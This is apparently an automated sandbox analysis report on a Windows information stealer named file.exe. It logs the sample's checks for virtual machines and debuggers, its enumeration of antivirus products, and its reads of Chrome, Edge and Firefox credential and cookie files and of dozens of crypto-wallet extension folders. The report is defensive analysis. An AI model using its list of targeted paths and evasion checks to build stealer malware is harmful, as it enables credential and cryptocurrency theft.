              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5308Thread sleep time: -38019s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6136Thread sleep time: -36018s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 4568Thread sleep time: -32000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 1048Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6716Thread sleep time: -30015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5092Thread sleep time: -44022s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.2578909258.00000000065AB000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2574697199.00000000002EF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: file.exe, 00000000.00000002.2575484115.00000000011C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2575484115.0000000001187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: file.exe, 00000000.00000002.2575484115.00000000011A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: file.exe, 00000000.00000003.2213895525.000000000580A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: file.exe, 00000000.00000002.2578909258.00000000065AB000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2574697199.00000000002EF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: file.exe, 00000000.00000003.2213895525.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: file.exe, 00000000.00000002.2578909258.00000000065AB000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: HiKProgram Manager
              Source: file.exe, 00000000.00000002.2574697199.00000000002EF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: QProgram Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.2286107645.0000000001227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5044, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exe, 00000000.00000003.2185548493.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/Electrum-LTCo9
              Source: file.exe, 00000000.00000003.2185548493.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/ElectronCashU98
              Source: file.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exeString found in binary or memory: Wallets/Exodus
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
